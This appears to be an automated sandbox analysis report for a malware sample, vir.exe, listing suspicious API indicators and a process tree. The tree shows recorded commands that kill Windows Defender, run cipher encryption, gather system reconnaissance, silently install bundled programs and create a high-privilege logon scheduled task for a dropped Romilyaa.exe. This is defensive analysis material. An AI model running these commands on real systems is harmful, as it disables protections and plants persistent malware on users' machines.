Suspicious use of SendNotifyMessage 48 IoCs
pid Process 2540 efsui.exe 2540 efsui.exe 2540 efsui.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 2704 3.exe 1692 Romilyaa.exe 1836 Romilyaa.exe 2916 Romilyaa.exe 2908 Romilyaa.exe 2404 Romilyaa.exe 2580 Romilyaa.exe 2392 Romilyaa.exe 2656 vlc.exe 2656 vlc.exe 2156 Romilyaa.exe 3196 Romilyaa.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2588 f3cb220f1aaa32ca310586e5f62dcab1.exe 2064 Romilyaa.exe 1104 Romilyaa.exe 2052 jaffa.exe 2052 jaffa.exe 2052 jaffa.exe 3480 dxwbwewlne.exe 3708 zyrnalmo.exe 3480 dxwbwewlne.exe 3332 yjpiisywuzrev.exe 3708 zyrnalmo.exe 3480 dxwbwewlne.exe 1872 eususxtzrybfydh.exe 3332 yjpiisywuzrev.exe 3708 zyrnalmo.exe 3332 yjpiisywuzrev.exe 1872 eususxtzrybfydh.exe 1872 eususxtzrybfydh.exe -
Suspicious use of SetWindowsHookEx 33 IoCs
pid Process 2548 iexplore.exe 2548 iexplore.exe 2964 IEXPLORE.EXE 2964 IEXPLORE.EXE 2860 iexplore.exe 2860 iexplore.exe 3000 IEXPLORE.EXE 3000 IEXPLORE.EXE 2704 3.exe 2704 3.exe 2860 iexplore.exe 2860 iexplore.exe 1844 IEXPLORE.EXE 1844 IEXPLORE.EXE 1692 Romilyaa.exe 1844 IEXPLORE.EXE 1844 IEXPLORE.EXE 4092 IEXPLORE.EXE 4092 IEXPLORE.EXE 2656 vlc.exe 4092 IEXPLORE.EXE 4092 IEXPLORE.EXE 3000 IEXPLORE.EXE 3000 IEXPLORE.EXE 2708 IEXPLORE.EXE 2708 IEXPLORE.EXE 3328 IEXPLORE.EXE 3328 IEXPLORE.EXE 2708 IEXPLORE.EXE 2708 IEXPLORE.EXE 1192 WINWORD.EXE 1192 WINWORD.EXE 3636 sjhkhda.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2692 wrote to memory of 2348 2692 vir.exe 31 PID 2692 wrote to memory of 2348 2692 vir.exe 31 PID 2692 wrote to memory of 2348 2692 vir.exe 31 PID 2692 wrote to memory of 2348 2692 vir.exe 31 PID 2348 wrote to memory of 632 2348 cmd.exe 33 PID 2348 wrote to memory of 632 2348 cmd.exe 33 PID 2348 wrote to memory of 632 2348 cmd.exe 33 PID 2348 wrote to memory of 632 2348 cmd.exe 33 PID 2348 wrote to memory of 620 2348 cmd.exe 34 PID 2348 wrote to memory of 620 2348 cmd.exe 34 PID 2348 wrote to memory of 620 2348 cmd.exe 34 PID 2348 wrote to memory of 620 2348 cmd.exe 34 PID 2348 wrote to memory of 1492 2348 cmd.exe 35 PID 2348 wrote to memory of 1492 2348 cmd.exe 35 PID 2348 wrote to memory of 1492 2348 cmd.exe 35 PID 2348 wrote to memory of 1492 2348 cmd.exe 35 PID 620 wrote to memory of 1248 620 cmd.exe 38 PID 620 wrote to memory of 1248 620 cmd.exe 38 PID 620 wrote to memory of 1248 620 cmd.exe 38 PID 620 wrote to memory of 1248 620 cmd.exe 38 PID 632 wrote to memory of 1836 632 cmd.exe 39 PID 632 wrote to memory of 1836 632 cmd.exe 39 PID 632 wrote to memory of 1836 632 cmd.exe 39 PID 632 wrote to memory of 1836 632 cmd.exe 39 PID 620 wrote to memory of 740 620 cmd.exe 40 PID 620 wrote to memory of 740 620 cmd.exe 40 PID 620 wrote to memory of 740 620 cmd.exe 40 PID 620 wrote to memory of 740 620 cmd.exe 40 PID 632 wrote to memory of 536 632 cmd.exe 41 PID 632 wrote to memory of 536 632 cmd.exe 41 PID 632 wrote to memory of 536 632 cmd.exe 41 PID 632 wrote to memory of 536 632 cmd.exe 41 PID 740 wrote to memory of 2896 740 net.exe 42 PID 740 wrote to memory of 2896 740 net.exe 42 PID 740 wrote to memory of 2896 740 net.exe 42 PID 740 wrote to memory of 2896 740 net.exe 42 PID 632 wrote to memory of 1592 632 cmd.exe 43 PID 632 wrote to memory of 1592 632 cmd.exe 43 PID 632 wrote to memory of 1592 632 cmd.exe 43 PID 632 wrote to memory of 1592 632 cmd.exe 43 PID 620 wrote to memory of 448 620 cmd.exe 44 PID 620 wrote to memory of 448 620 cmd.exe 44 PID 620 wrote to memory of 448 620 cmd.exe 44 PID 620 wrote to memory of 448 620 cmd.exe 44 PID 448 wrote to memory of 1504 448 net.exe 45 PID 448 wrote to memory of 1504 448 net.exe 45 PID 448 wrote to memory of 1504 448 net.exe 45 PID 448 wrote to memory of 1504 448 net.exe 45 PID 620 wrote to memory of 2992 620 cmd.exe 46 PID 620 wrote to memory of 2992 620 cmd.exe 46 PID 620 wrote to memory of 2992 620 cmd.exe 46 PID 620 wrote to memory of 2992 620 cmd.exe 46 PID 2348 wrote to memory of 2400 2348 cmd.exe 48 PID 2348 wrote to memory of 2400 2348 cmd.exe 48 PID 2348 wrote to memory of 2400 2348 cmd.exe 48 PID 2348 wrote to memory of 2400 2348 cmd.exe 48 PID 2348 wrote to memory of 2260 2348 cmd.exe 50 PID 2348 wrote to memory of 2260 2348 cmd.exe 50 PID 2348 wrote to memory of 2260 2348 cmd.exe 50 PID 2348 wrote to memory of 2260 2348 cmd.exe 50 PID 2548 wrote to memory of 2964 2548 iexplore.exe 53 PID 2548 wrote to memory of 2964 2548 iexplore.exe 53 PID 2548 wrote to memory of 2964 2548 iexplore.exe 53 PID 2548 wrote to memory of 2964 2548 iexplore.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exeC:\Users\Admin\AppData\Local\Temp\vir.exe sh $MOZILLA/ %SIGINT% "SIGTERM|DESTROY|SIGKILL"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\!main.cmd" "sh" "$MOZILLA/" "%SIGINT%" "SIGTERM|DESTROY|SIGKILL""2⤵
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:1836
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- Enumerates system info in registry
PID:536
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:1248
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵PID:2896
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵PID:1504
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WindowsDefender.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K handler.cmd3⤵
- System Location Discovery: System Language Discovery
PID:2260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K cipher.cmd3⤵
- System Location Discovery: System Language Discovery
PID:2380 -
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:668
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:3352
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:3728
-
-
C:\Windows\SysWOW64\cipher.execipher /e4⤵
- System Location Discovery: System Language Discovery
PID:3816
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\Rover.exeRover.exe3⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\web.htm3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2860 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3000
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:406532 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1844
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:209941 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4092
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:209955 /prefetch:24⤵
- Suspicious use of SetWindowsHookEx
PID:3328
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2860 CREDAT:603156 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2708
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\Google.exeGoogle.exe3⤵
- Executes dropped EXE
PID:956
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\helper.vbs"3⤵PID:2252
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2220
-
-
C:\Windows\SysWOW64\PING.EXEping mrbeast.codes -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3196
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Google.exe C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4044
-
-
C:\Windows\SysWOW64\xcopy.exexcopy Rover.exe C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:4056
-
-
C:\Windows\SysWOW64\xcopy.exexcopy spinner.gif C:\Users\Admin\Desktop3⤵
- Enumerates system info in registry
PID:4068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K bloatware.cmd3⤵
- Loads dropped DLL
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\1.exe1.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
PID:2792 -
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3744 -
C:\Program Files (x86)\DroidCam\vc_redist.x86.exe"C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet -burn.unelevated BurnPipe.{DA901F80-E633-4148-BED2-11C763DF9F96} {FB00F5CC-4082-44CF-80BE-8CD4E60D76E2} 37446⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3304
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c install.bat5⤵PID:1888
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "DroidCamFilter32.ax"6⤵
- Loads dropped DLL
- Modifies registry class
PID:832
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "DroidCamFilter64.ax"6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2796 -
C:\Windows\system32\regsvr32.exe/s "DroidCamFilter64.ax"7⤵
- Loads dropped DLL
- Modifies registry class
PID:2732
-
-
-
-
C:\Program Files (x86)\DroidCam\lib\insdrv.exe"C:\Program Files (x86)\DroidCam\lib\insdrv.exe" +a5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\3.exe3.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2704 -
C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exeC:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe --config "C:\Users\Admin\AppData\Local\Psiphon3\psiphon.config" --serverList "C:\Users\Admin\AppData\Local\Psiphon3\server_list.dat"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2264
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ipfounder.net/?sponsor_id=1BC527D3D09985CF&sponsor=psiphon&client_region=GB&client_asn=174&client_platform=windows&secret=580EfjEI29xL3hoyU6dgP4vSEVxdcGI7JDFkxgjds7PHulSEF0wmORpvzbqxyTwYtpowsY4xMFnfWEnTghe6l8jiV9K5QSZoir2i6fDeKJD6EhL6DkoYTEMu2EE9YJvy3LdCUZ7ncdVC6ipgWx06wznvDLbY1ajfcfRGCpfsQJei2q6tb0GSFh1QK3x3qXKwyjmNPc5J&psireason=connect&psicash=eyJtZXRhZGF0YSI6eyJjbGllbnRfcmVnaW9uIjoiR0IiLCJjbGllbnRfdmVyc2lvbiI6IjE3OSIsInByb3BhZ2F0aW9uX2NoYW5uZWxfaWQiOiI5MkFBQ0M1QkFCRTA5NDRDIiwic3BvbnNvcl9pZCI6IjFCQzUyN0QzRDA5OTg1Q0YiLCJ1c2VyX2FnZW50IjoiUHNpcGhvbi1Qc2lDYXNoLVdpbmRvd3MiLCJ2IjoxfSwidGltZXN0YW1wIjoiMjAyNS0wMS0xN1QxMTo0MzowNy42NTJaIiwidG9rZW5zIjpudWxsLCJ2IjoxfQ5⤵PID:2808
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\2.hta"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K SilentSetup.cmd4⤵
- Loads dropped DLL
PID:2836 -
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.exe /SP- /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\is-7MVR1.tmp\WinaeroTweaker-1.40.0.0-setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7MVR1.tmp\WinaeroTweaker-1.40.0.0-setup.tmp" /SL5="$1030E,2180794,169984,C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\bloatware\4\WinaeroTweaker-1.40.0.0-setup.exe" /SP- /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweaker.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:1152 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweaker.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im winaerotweakerhelper.exe /f7⤵
- System Location Discovery: System Language Discovery
PID:2448 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im winaerotweakerhelper.exe /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\regmess.exeregmess.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4088 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\regmess_21016d95-8526-4e44-8d9e-f34c644758b6\regmess.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:2832 -
C:\Windows\SysWOW64\reg.exereg import Setup.reg /reg:325⤵PID:320
-
-
C:\Windows\SysWOW64\reg.exereg import Console.reg /reg:325⤵PID:1908
-
-
C:\Windows\SysWOW64\reg.exereg import Desktop.reg /reg:325⤵
- Sets desktop wallpaper using registry
PID:2872
-
-
C:\Windows\SysWOW64\reg.exereg import International.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\reg.exereg import Fonts.reg /reg:325⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:884
-
-
C:\Windows\SysWOW64\reg.exereg import Cursors.reg /reg:325⤵
- System Location Discovery: System Language Discovery
PID:2772
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 103⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1776
-
-
C:\Users\Admin\AppData\Local\Temp\vir_c2c11d02-c101-4931-8ba3-35012f173b3d\scary.exescary.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2884 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1480
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1692 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3260
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4yzJw6YZhZ8v.bat" "5⤵PID:2700
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:2764
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2276
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1836 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:868
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QRAnwnjZ7xGQ.bat" "7⤵PID:1544
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:3024
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2072
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2916 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2824
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\3E09nEw6OKRy.bat" "9⤵PID:1584
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:4092
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3240
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2908 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:380
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tZnR3FL31OvT.bat" "11⤵PID:3444
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:3360
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2764
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"12⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2404 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:3632
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RBBVyGfBClc2.bat" "13⤵PID:3840
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3076
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1840
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"14⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2580 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\33AxhRm8JDqs.bat" "15⤵PID:2740
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:780
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1520
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"16⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2392 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:3236
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\VzwbLuUGPIDk.bat" "17⤵PID:1380
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:3492
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4080
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"18⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2156 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:3636
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\zM0vo3GgfhPd.bat" "19⤵PID:3816
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:3832
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3348
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"20⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3196 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:4056
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\hBf5YrKVrr8F.bat" "21⤵PID:2896
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3672
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:400
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"22⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2064 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:1740
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\W4XuVn9ZFNK8.bat" "23⤵PID:3524
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:904
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3488
-
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"24⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1104 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:2052
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\LLpLRuJU60o4.bat" "25⤵PID:2820
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:2972
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:940
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
